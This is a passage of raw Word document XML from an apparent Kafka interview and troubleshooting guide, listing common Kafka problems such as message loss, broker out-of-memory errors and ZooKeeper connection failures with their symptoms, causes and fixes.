          <w:numId w:val="164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kafka-topics.sh shows under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF49967" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Risk of data loss if a broker fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADF88F"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61254E67" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Broker(s) down or slow to respond.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3DB80E" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Network partition or high disk I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCAEDD8"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D133B94" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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heck broker health and restart failed instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E17AE0" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Increase replica.fetch.max.bytes or replica.lag.time.max.ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633C29B" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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nsure ISR (in-sync replicas) configuration is appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABDAF57" w14:textId="77777777" w:rsidR="00E43F03"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87ABAD">
          <v:rect id="_x0000_i3250" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC8056"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4. Message Duplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D43405"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC4FF4" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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ame message processed multiple times by consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3F698"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D47EC7B" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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acks=0 or acks=1 with retries can lead to duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47D432" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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nsumer not committing offsets properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA44DC5"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13483C9C" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent producer</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (enable.idempotence=true).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5549EF6F" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly-once semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (EOS) if required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10734919" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Ensure offset commits are done </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C7FA68" w14:textId="77777777" w:rsidR="00E43F03"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5D1C637">
          <v:rect id="_x0000_i3251" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE35B4"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5. Message Loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF36FE"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADB119" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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issing messages between producer and consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FEB77"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA916D7" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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acks=0 or acks=1 with producer crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DDEB14" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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nsumers committing offsets before successful processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77904836"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752F39AC" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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Use acks=all, min.insync.replicas=2 for durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC477A4" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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Only commit offsets </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing and persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2EA7AC" w14:textId="77777777" w:rsidR="00E43F03"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BAE18ED">
          <v:rect id="_x0000_i3252" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE323D6"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6. Broker Crashes or OOM Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E2A4FB"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DFFBAA" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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Broker JVM crashes or restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6715D" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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Logs show "OutOfMemoryError".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF7D700"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FFE927" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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oo many partitions per broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A041F4" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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oor JVM heap settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770EFDBC" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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essage backlog (consumers not keeping up).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15291C2C"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A75A9" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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Reduce partition count per broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F0BEA5" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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une JVM heap size and garbage collector (G1GC recommended).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CE8926" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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cale out brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C703C0A" w14:textId="77777777" w:rsidR="00E43F03"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10FF19FC">
          <v:rect id="_x0000_i3253" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BC1F2D"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7. High Latency or Low Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1404EF7F"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C648F11" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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roducers or consumers show delays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D12DEE" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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Kafka becomes sluggish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBEA7C"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBF8DE1" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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mall batch sizes or linger.ms set too low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2F43D" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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Disk or network bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50999B"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1821BA29" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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une batch.size, linger.ms, and enable compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EF6B45" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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Use SSDs for broker logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF30EA1" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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onitor and improve disk/network performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16852B28" w14:textId="77777777" w:rsidR="00E43F03"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594A2F4">
          <v:rect id="_x0000_i3254" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD549E4"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8. Zookeeper Connection Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8077AF"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7C55D5" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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Kafka brokers can't connect to ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F59D60" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165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luster fails to form or elect a leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA35347"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE97C0" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Network issues, incorrect ZooKeeper connect strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D042C4" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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ZooKeeper nodes down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E44E0"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC51FE3" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Verify ZooKeeper status (zkServer.sh status).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7765317C" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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nsure all nodes are reachable and have proper configs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00286327" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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nsider migrating to KRaft mode in newer Kafka versions (no ZooKeeper).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28708172" w14:textId="77777777" w:rsidR="00E43F03"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3C2C47">
          <v:rect id="_x0000_i3255" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F22C7AE"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9. Offset Commit Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7453618F"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD294D3" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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nsumer group reprocesses same messages after restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A42F74" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Logs show commit failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD55F2"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9718D5" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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nsumer crashes before committing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A056DB" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Auto commit is on but too frequent or too slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A30E13B"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D6DD3" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual offset commit</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with proper error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB05E0" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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et enable.auto.commit=false and commit after successful processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0D547E" w14:textId="77777777" w:rsidR="00E43F03"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97B7E20">
          <v:rect id="_x0000_i3256" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F31BF" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03"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10. Topic Configuration Mistakes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD473A2"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A64E272" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Uneven load distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B500C07" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Data loss due to too low replication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EA2F7F"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2D1BDC" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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oo few partitions or replication factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C92C960" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Default settings used without tuning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7644247D" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38CD97" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Review topic configs: partition count, replication, retention, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3133EF33" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166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Use kafka-topics.sh --describe to audit topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BDF88B" w14:textId="24ED0C39"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66DDAFE">
          <v:rect id="_x0000_i3257" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F4999A" w14:textId="41F4BBD7" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="001B4C3B" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="815" w:name="_Toc196308295"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>List common Kafka problems, such as disk full errors, under-replicated partitions, and slow consumers, and explain how to resolve them</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="815"/>
    </w:p>
    <w:p w14:paraId="004114CD" w14:textId="3DBF32D1" w:rsidR="000F58AC" w:rsidRPr="004269A3" w:rsidRDefault="000F58AC" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Here’s a detailed list of </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common Kafka problems</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, including </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>symptoms, causes, and resolutions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is helpful for both interviews and real-world troubleshooting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC7B3B2" w14:textId="77777777" w:rsidR="000F58AC"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0570280">
          <v:rect id="_x0000_i3258" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
